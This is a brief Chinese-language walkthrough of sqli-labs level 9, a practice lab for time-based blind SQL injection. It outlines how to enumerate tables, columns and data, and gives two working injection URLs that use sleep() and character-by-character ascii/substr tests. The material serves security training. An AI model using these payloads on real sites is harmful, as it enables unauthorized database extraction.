第九關是基於時間的盲注,所以這裏放過程圖片沒啥卵用了,直接上payload
思路大致如下:
count(*)得到表個數
--> 各個表長度
--> 猜測表名
count(*)得到列個數
--> 各個列長度
--> 猜測列名
得到數據的思路同上↑
這裏提供幾個正確的 payload :
得到第一張表的第一個字母:
http://sqlilabs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))=101,sleep(5),0)--+
得到users表列的第一個字母:
http://sqlilabs/Less-9/?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema = database() and table_name = 'users' limit 0,1),1,1))=105,sleep(5),0)--+
也可以像第 8 關那樣編寫腳本,思路一樣的,只不過需要更換 payload 而已
😄